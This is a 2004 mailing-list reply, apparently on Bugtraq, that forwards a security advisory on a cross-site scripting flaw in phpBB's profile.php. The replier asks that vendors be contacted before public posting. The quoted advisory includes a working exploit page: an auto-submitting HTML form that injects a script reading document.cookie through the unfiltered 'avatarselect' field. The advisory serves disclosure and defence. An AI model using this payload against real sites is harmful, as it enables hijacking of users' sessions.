RE: Fw: phpBB profile.php Cross Site Scripting Vulnerability
I'm going to say this again. Please contact security@ before posting here,
and give them an appropriate amount of time to reply. This goes for _any_
software company. Thank you.
----- Original Message -----
From: "Cheng Peng Su" <apple_soup@xxxxxxx>
To: <bugtraq@xxxxxxxxxxxxxxxxx>
Sent: Saturday, March 20, 2004 10:36 PM
Subject: phpBB profile.php Cross Site Scripting Vulnerability
|
|
|
| #####################################################################
|
| Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
| Release Date : Mar 21,2004
| Application : phpBB
| Version : phpBB 2.0.6d or others?
| Platform : PHP
| Vendor URL : http://www.phpbb.com/
| Author : Cheng Peng Su(apple_soup_at_msn.com)
|
| #####################################################################
|
| Proof of Conecpt:
|
| This vuln is in profile.php,when you click [Show Gallery],phpBB
| will show you Avatar gallery,asking you to choose one for yourself.
| The hole is in the form,after submitting phpBB will use the value of
| "avatarselect" as the path of the gallery directly,without filtering
| any illegal characters.
|
| Exploit:
|
| -------------exploit.htm--------------
| <form name='f' action="http://site/profile.php?mode=editprofile"
method="post">
| <input name="avatarselect" value='"
><script>alert(document.cookie)</script>'>
| <input type="submit" name="submitavatar" value="Select avatar">
| </form>
| <script>
| window.onload=function()
| {
| document.all.submitavatar.click();
| }
| </script>
| ---------------end-------------------
|
| Contact:
|
| Cheng Peng Su
| Class 1,Senior 2,High school attached to Wuhan University
| Wuhan,Hubei,China(430072)
| apple_soup_at_msn.com
|
--------------------------------------------------------------------
mail2web - Check your email from the web at
http://mail2web.com/ .